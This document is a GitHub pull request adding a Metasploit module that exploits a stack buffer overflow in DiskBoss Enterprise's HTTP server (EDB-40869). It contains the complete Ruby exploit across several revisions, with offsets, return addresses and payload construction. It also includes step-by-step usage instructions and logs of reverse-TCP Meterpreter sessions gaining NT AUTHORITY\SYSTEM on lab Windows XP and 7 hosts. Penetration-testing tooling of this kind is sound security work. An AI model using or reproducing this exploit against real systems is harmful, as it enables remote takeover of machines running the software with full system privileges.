### PR TITLE
Add module for DiskBoss Enterprise (EDB-40869)

### DIFF
--- a/documentation/modules/exploit/windows/http/diskboss_get_bof.md
+++ b/documentation/modules/exploit/windows/http/diskboss_get_bof.md
@@ -1,6 +1,6 @@
 ## Vulnerable Application
 
-DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
+[DiskBoss Enterprise](http://www.diskboss.com) versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/71a11b97d2361389b9099e57f6400270-diskbossent_setup_v7.4.28.exe).
 
 ## Verification Steps
   1. Install a vulnerable DiskBoss Enterprise
@@ -10,15 +10,17 @@ DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer 
   5. Check `Enable Web Server On Port 80` to start the web interface
   6. Start `msfconsole`
   7. Do `use exploit/windows/http/diskboss_get_bof`
-  8. Do `set rhost 192.168.198.130`
+  8. Do `set rhost ip`
   9. Do `check`
   10. Verify the target is vulnerable
   11. Do `set payload windows/meterpreter/reverse_tcp`
-  12. Do `set lhost 192.168.198.138`
+  12. Do `set lhost ip`
   13. Do `exploit`
   14. Verify the Meterpreter session is opened
 
 ## Scenarios
+
+###DiskBoss Enterprise v7.5.12 on Windows XP SP3
 
 ```
 msf exploit(diskboss_get_bof) > options
@@ -68,10 +70,12 @@ System Language : en_US
 Domain          : WORKGROUP
 Logged On Users : 2
 Meterpreter     : x86/win32
-meterpreter > exit
-[*] Shutting down Meterpreter...
+meterpreter >
+```
 
-[*] 192.168.198.130 - Meterpreter session 1 closed.  Reason: User exit
+###DiskBoss Enterprise v7.4.28 on Windows 7 SP1
+
+```
 msf exploit(diskboss_get_bof) > set rhost 192.168.198.133
 rhost => 192.168.198.130
 msf exploit(diskboss_get_bof) > exploit

--- a/documentation/modules/exploit/windows/http/diskboss_get_bof.md
+++ b/documentation/modules/exploit/windows/http/diskboss_get_bof.md
@@ -1,0 +1,96 @@
+## Vulnerable Application
+
+DiskBoss Enterprise versions up to v7.5.12 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1.
+
+## Verification Steps
+  1. Install a vulnerable DiskBoss Enterprise
+  2. Start `DiskBoss Enterprise` service
+  3. Start `DiskBoss Enterprise` client application
+  4. Navigate to `Tools` > `DiskBoss Server Options` > `Server`
+  5. Check `Enable Web Server On Port 80` to start the web interface
+  6. Start `msfconsole`
+  7. Do `use exploit/windows/http/diskboss_get_bof`
+  8. Do `set rhost 192.168.198.130`
+  9. Do `check`
+  10. Verify the target is vulnerable
+  11. Do `set payload windows/meterpreter/reverse_tcp`
+  12. Do `set lhost 192.168.198.138`
+  13. Do `exploit`
+  14. Verify the Meterpreter session is opened
+
+## Scenarios
+
+```
+msf exploit(diskboss_get_bof) > options
+
+Module options (exploit/windows/http/diskboss_get_bof):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST    192.168.198.130  yes       The target address
+   RPORT    80               yes       The target port
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.198.138  yes       The listen address
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Targeting
+
+
+msf exploit(diskboss_get_bof) > exploit
+
+[*] Started reverse TCP handler on 192.168.198.138:4444 
+[*] Automatically detecting the target...
+[*] Selected Target: DiskBoss Enterprise v7.5.12
+[*] Sending stage (957999 bytes) to 192.168.198.130
+[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:4476) at 2017-01-08 05:12:46 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : GABOR-03722ADE8
+OS              : Windows XP (Build 2600, Service Pack 3).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/win32
+meterpreter > exit
+[*] Shutting down Meterpreter...
+
+[*] 192.168.198.130 - Meterpreter session 1 closed.  Reason: User exit
+msf exploit(diskboss_get_bof) > set rhost 192.168.198.133
+rhost => 192.168.198.130
+msf exploit(diskboss_get_bof) > exploit
+
+[*] Started reverse TCP handler on 192.168.198.138:4444 
+[*] Automatically detecting the target...
+[*] Selected Target: DiskBoss Enterprise v7.4.28
+[*] Sending stage (957999 bytes) to 192.168.198.133
+[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49187) at 2017-01-08 05:16:13 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-BCJL9PJ5BF5
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/win32
+meterpreter >
+```

--- a/modules/exploits/windows/http/diskboss_get_bof.rb
+++ b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -29,7 +29,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'References'     =>
         [
-          [' EDB', '40869']
+          ['EDB', '40869']
         ],
       'DefaultOptions' =>
         {

--- a/modules/exploits/windows/http/diskboss_get_bof.rb
+++ b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -43,18 +43,21 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
-          ['Automatic Targeting',
+          [
+            'Automatic Targeting',
             {
               'auto' => true
             }
           ],
-          [ 'DiskBoss Enterprise v7.4.28',
+          [
+            'DiskBoss Enterprise v7.4.28',
             {
               'Offset' => 2471,
               'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [libpal.dll]
             }
           ],
-          [ 'DiskBoss Enterprise v7.5.12',
+          [
+            'DiskBoss Enterprise v7.5.12',
             {
               'Offset' => 2471,
               'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]
@@ -63,15 +66,14 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'Privileged'     => true,
       'DisclosureDate' => 'Dec 05 2016',
-      'DefaultTarget'  => 0
-    ))
+      'DefaultTarget'  => 0))
   end
 
   def check
-    res = send_request_cgi({
+    res = send_request_cgi(
       'method' => 'GET',
-      'uri' => '/'
-    })
+      'uri'    => '/'
+    )
 
     if res && res.code == 200
       if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
@@ -80,7 +82,7 @@ class MetasploitModule < Msf::Exploit::Remote
         return Exploit::CheckCode::Detected
       end
     else
-      vprint_error("Unable to determine due to a HTTP connection timeout")
+      vprint_error('Unable to determine due to a HTTP connection timeout')
       return Exploit::CheckCode::Unknown
     end
 
@@ -90,15 +92,15 @@ class MetasploitModule < Msf::Exploit::Remote
   def exploit
     mytarget = target
 
-    if (target['auto'])
+    if target['auto']
       mytarget = nil
 
-      print_status("Automatically detecting the target...")
+      print_status('Automatically detecting the target...')
 
-      res = send_request_cgi({
+      res = send_request_cgi(
         'method' => 'GET',
-        'uri' => '/'
-      })
+        'uri'    => '/'
+      )
 
       if res && res.code == 200
         if res.body =~ /DiskBoss Enterprise v7\.4\.28/
@@ -108,8 +110,8 @@ class MetasploitModule < Msf::Exploit::Remote
         end
       end
 
-      if (not mytarget)
-        fail_with(Failure::NoTarget, "No matching target")
+      if !mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
       end
 
       print_status("Selected Target: #{mytarget.name}")
@@ -121,9 +123,9 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << [mytarget.ret].pack('V')
     sploit << rand_text_alpha(2500)
 
-    res = send_request_cgi({
+    send_request_cgi(
       'method' => 'GET',
-      'uri' => sploit
-    })
+      'uri'    => sploit
+    )
   end
 end

--- a/modules/exploits/windows/http/diskboss_get_bof.rb
+++ b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -16,10 +16,10 @@ class MetasploitModule < Msf::Exploit::Remote
       'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',
       'Description'    => %q{
           This module exploits a stack-based buffer overflow vulnerability
-        in the web interface of DiskBoss Enterprise v7.4.28, caused by
-        improper bounds checking of the request path in HTTP GET requests
-        sent to the built-in web server. This module has been tested
-        successfully on Windows XP SP3 and Windows 7 SP1.
+        in the web interface of DiskBoss Enterprise v7.5.12 and v7.4.28,
+        caused by improper bounds checking of the request path in HTTP GET
+        requests sent to the built-in web server. This module has been
+        tested successfully on Windows XP SP3 and Windows 7 SP1.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -43,10 +43,21 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'Targets'        =>
         [
+          ['Automatic Targeting',
+            {
+              'auto' => true
+            }
+          ],
           [ 'DiskBoss Enterprise v7.4.28',
             {
               'Offset' => 2471,
-              'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [Lgi.dll]
+              'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [libpal.dll]
+            }
+          ],
+          [ 'DiskBoss Enterprise v7.5.12',
+            {
+              'Offset' => 2471,
+              'Ret'    => 0x100461da  # ADD ESP,0x68 # RETN [libpal.dll]
             }
           ]
         ],
@@ -63,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     })
 
     if res && res.code == 200
-      if res.body =~ /DiskBoss Enterprise v7\.4\.28/
+      if res.body =~ /DiskBoss Enterprise v7\.(4\.28|5\.12)/
         return Exploit::CheckCode::Vulnerable
       elsif res.body =~ /DiskBoss Enterprise/
         return Exploit::CheckCode::Detected
@@ -77,10 +88,37 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    mytarget = target
+
+    if (target['auto'])
+      mytarget = nil
+
+      print_status("Automatically detecting the target...")
+
+      res = send_request_cgi({
+        'method' => 'GET',
+        'uri' => '/'
+      })
+
+      if res && res.code == 200
+        if res.body =~ /DiskBoss Enterprise v7\.4\.28/
+          mytarget = targets[1]
+        elsif res.body =~ /DiskBoss Enterprise v7\.5\.12/
+          mytarget = targets[2]
+        end
+      end
+
+      if (not mytarget)
+        fail_with(Failure::NoTarget, "No matching target")
+      end
+
+      print_status("Selected Target: #{mytarget.name}")
+    end
+
     sploit =  make_nops(21)
     sploit << payload.encoded
-    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
-    sploit << [target.ret].pack('V')
+    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+    sploit << [mytarget.ret].pack('V')
     sploit << rand_text_alpha(2500)
 
     res = send_request_cgi({

--- a/modules/exploits/windows/http/diskboss_get_bof.rb
+++ b/modules/exploits/windows/http/diskboss_get_bof.rb
@@ -1,0 +1,91 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DiskBoss Enterprise GET Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability
+        in the web interface of DiskBoss Enterprise v7.4.28, caused by
+        improper bounds checking of the request path in HTTP GET requests
+        sent to the built-in web server. This module has been tested
+        successfully on Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'vportal',      # Vulnerability discovery and PoC
+          'Gabor Seljan'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          [' EDB', '40869']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x09\x0a\x0d\x20",
+          'Space'      => 2000
+        },
+      'Targets'        =>
+        [
+          [ 'DiskBoss Enterprise v7.4.28',
+            {
+              'Offset' => 2471,
+              'Ret'    => 0x1004605c  # ADD ESP,0x68 # RETN [Lgi.dll]
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Dec 05 2016',
+      'DefaultTarget'  => 0
+    ))
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => '/'
+    })
+
+    if res && res.code == 200
+      if res.body =~ /DiskBoss Enterprise v7\.4\.28/
+        return Exploit::CheckCode::Vulnerable
+      elsif res.body =~ /DiskBoss Enterprise/
+        return Exploit::CheckCode::Detected
+      end
+    else
+      vprint_error("Unable to determine due to a HTTP connection timeout")
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    sploit =  make_nops(21)
+    sploit << payload.encoded
+    sploit << rand_text_alpha(target['Offset'] - payload.encoded.length)
+    sploit << [target.ret].pack('V')
+    sploit << rand_text_alpha(2500)
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => sploit
+    })
+  end
+end


### PR DESCRIPTION
This is an MSF port of https://www.exploit-db.com/exploits/40869/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskBoss Enterprise version 7.4.28. The vulnerable application is available for download at https://www.exploit-db.com/apps/71a11b97d2361389b9099e57f6400270-diskbossent_setup_v7.4.28.exe.

## Verification
- [x] Start `DiskBoss Enterprise` service
- [x] Start `DiskBoss Enterprise` client application
- [x] Navigate to `Tools` > `DiskBoss Server Options` > `Server`
- [x] Check `Enable Web Server On Port 80` to start the web interface
- [x] Start `msfconsole`
- [x] Do `use exploit/windows/http/diskboss_get_bof`
- [x] Do `set rhost 192.168.198.130`
- [x] Do `check`
- [x] Verify that the target is vulnerable
- [x] Do `set payload windows/meterpreter/reverse_tcp`
- [x] Do `set lhost 192.168.198.138`
- [x] Do `run`
- [x] Verify that the Meterpreter session is opened

Test run results below for Windows XP SP3:

```
msf > use exploit/windows/http/diskboss_get_bof
msf exploit(diskboss_get_bof) > run

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Sending stage (957999 bytes) to 192.168.198.130
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:2066) at 2017-01-07 11:59:03 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.198.130 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(diskboss_get_bof) >

```

Test run results below for Windows 7 SP1:

```
msf exploit(diskboss_get_bof) > run

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Sending stage (957999 bytes) to 192.168.198.133
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49245) at 2017-01-07 12:01:44 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BCJL9PJ5BF5
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.198.133 - Meterpreter session 2 closed.  Reason: User exit
msf exploit(diskboss_get_bof) >
```